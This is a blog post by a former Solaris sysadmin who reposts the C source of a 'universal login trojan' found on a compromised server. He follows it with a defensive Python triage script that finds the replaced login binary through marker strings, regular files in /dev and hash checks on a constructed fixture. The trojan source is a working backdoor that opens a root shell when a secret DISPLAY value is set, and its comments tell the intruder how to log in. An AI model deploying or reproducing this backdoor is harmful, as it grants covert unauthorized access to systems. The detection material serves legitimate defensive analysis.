Trojan (Universal login trojan) source code

April 28, 2008 at 7:29 am (OS, Solaris)

Back when I was doing Solaris sysadmin work, one of the company's servers was hacked (I found it less than a week after joining, so it had probably been owned for a long time before I got there -_-|||). The intruder was really careless: after compiling login.c and swapping it in for the real login program, they never deleted the source code, which is how I got to take a look at it (even though I still couldn't make much of it).

Maybe it's useful to keep, maybe not; I came across it while cleaning up old files today anyway, so I'm posting it here for everyone to see:

/*
* PRIVATE !! PRIVATE !! PRIVATE !! PRIVATE !! PRIVATE !! PRIVATE !! PRIVATE !!
* Universal login trojan by Tragedy/Dor
*  Email: rawpower@iname.com
*  IRC: [Dor]@ircnet
*
* Login trojan for pretty much any O/S...
* Tested on:   Linux, BSDI 2.0, FreeBSD, IRIX 6.x, 5.x, Sunos 5.5,5.6,5.7
*       OSF1/DGUX4.0,
* Known not to work on:
*  SunOS 4.x and 5.4... Seems the only variable passwd to login
*  on these versions of SunOS is the $TERM... and its passed via
*  commandline option... should be easy to work round in time
*
*   #define         PASSWORD  - Set your password here
*   #define         _PATH_LOGIN - This is where you moved the original login to
*  login to hacked host with...
*  from bourne shell (sh, bash) sh DISPLAY="your pass";export DISPLAY;telnet host
*
*/

#include        <stdio.h>
#if !defined(PASSWORD)
#define  PASSWORD "xxx"
#endif
#if !defined(_PATH_LOGIN)
# define                _PATH_LOGIN     "/dev/login"
#endif

main (argc, argv, envp)
int argc;
char **argv, **envp;
{
        char *display = getenv("DISPLAY");

        /* No DISPLAY in the environment: behave exactly like the real login */
        if ( display == NULL ) {
                execve(_PATH_LOGIN, argv, envp);
                perror(_PATH_LOGIN);
                exit(1);
        }
        /* DISPLAY matches the hard-coded password: drop straight to a shell */
        if (!strcmp(display,PASSWORD)) {
                system("/bin/sh");
                exit(1);
        }

        /* Anything else: hand over to the original login moved to _PATH_LOGIN */
        execve(_PATH_LOGIN, argv, envp);
        exit(1);
}
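The wrapper above leaves two traces on a box: the real login binary gets parked as a regular file at /dev/login (a directory that should only hold device nodes, directories and symlinks), and the replacement binary carries the strings "DISPLAY", "/bin/sh" and "/dev/login". The following is an added triage script written from the defender's side; it is not part of the original post and not the intruder's code. It works only on a constructed temp-directory fixture that imitates the compromise (the fake /dev, the "trojaned" and "clean" login stand-ins, and the "known-good" hash are all assumptions), so it never touches the real /dev or /bin/login. On a real system the hash comparison against the vendor package database (pkgchk on Solaris) is the reliable check; the string heuristic is only a quick first look for this specific wrapper.

```python
"""Added defensive example: triage checks for a replaced login binary of the
kind posted above. All paths and file contents are constructed stand-ins."""
import hashlib
import os
import stat
import tempfile

# Strings the posted trojan source leaves in a compiled binary.
# A genuine login may legitimately contain "/bin/sh", so that one alone
# is never treated as a finding.
TROJAN_MARKERS = (b"DISPLAY", b"/bin/sh", b"/dev/login")


def regular_files_in_dev(dev_dir):
    """Return names of regular files directly under a /dev-like directory.

    /dev normally holds device nodes, directories and symlinks. The posted
    trojan expects the real login to have been moved to /dev/login, so a
    plain file there deserves a look."""
    names = []
    for name in sorted(os.listdir(dev_dir)):
        st = os.lstat(os.path.join(dev_dir, name))
        if stat.S_ISREG(st.st_mode):
            names.append(name)
    return names


def marker_strings(path):
    """Return which TROJAN_MARKERS occur in the file's raw bytes, in order."""
    with open(path, "rb") as f:
        data = f.read()
    return [m.decode() for m in TROJAN_MARKERS if m in data]


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def check_login_binary(path, known_good_sha256=None):
    """Return a list of findings for a login binary (empty means nothing seen).

    The hash comparison is the reliable check; the string heuristic is only
    quick triage for the specific wrapper posted above."""
    findings = []
    hits = marker_strings(path)
    if "/dev/login" in hits or ("DISPLAY" in hits and "/bin/sh" in hits):
        findings.append("trojan-like strings: " + ", ".join(hits))
    if known_good_sha256 is not None and sha256_file(path) != known_good_sha256:
        findings.append("sha256 differs from known-good build")
    return findings


def build_constructed_fixture():
    """Create a temp tree imitating the compromise: a fake /dev holding a
    regular file 'login', a trojaned login, and a clean login for comparison.
    Every file is a constructed stand-in, not a real binary."""
    root = tempfile.mkdtemp(prefix="login-check-demo-")
    dev = os.path.join(root, "dev")
    os.mkdir(dev)
    os.mkdir(os.path.join(dev, "pts"))                  # directory: expected in /dev
    os.symlink("null", os.path.join(dev, "stdout"))     # symlink: expected in /dev
    with open(os.path.join(dev, "login"), "wb") as f:   # regular file: suspicious
        f.write(b"\x7fELF original-login-stand-in")
    trojan = os.path.join(root, "login.trojan")
    with open(trojan, "wb") as f:
        f.write(b"\x7fELF\0DISPLAY\0/bin/sh\0/dev/login\0")
    clean = os.path.join(root, "login.clean")
    with open(clean, "wb") as f:
        f.write(b"\x7fELF\0/etc/passwd\0/bin/sh\0")      # a real login may mention /bin/sh
    return dev, trojan, clean


def run_demo():
    """Run every check against the constructed fixture and return the results."""
    dev, trojan, clean = build_constructed_fixture()
    good_hash = sha256_file(clean)                      # assumed known-good hash
    return {
        "regular_files_in_dev": regular_files_in_dev(dev),
        "trojan_findings": check_login_binary(trojan, good_hash),
        "clean_findings": check_login_binary(clean, good_hash),
    }


if __name__ == "__main__":
    for name, result in run_demo().items():
        print(name, "->", result)
```

Running it reports "login" as the only regular file in the fake /dev, two findings for the trojaned stand-in (the marker strings and the hash mismatch) and none for the clean one, which also shows why "/bin/sh" on its own is not used as evidence.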
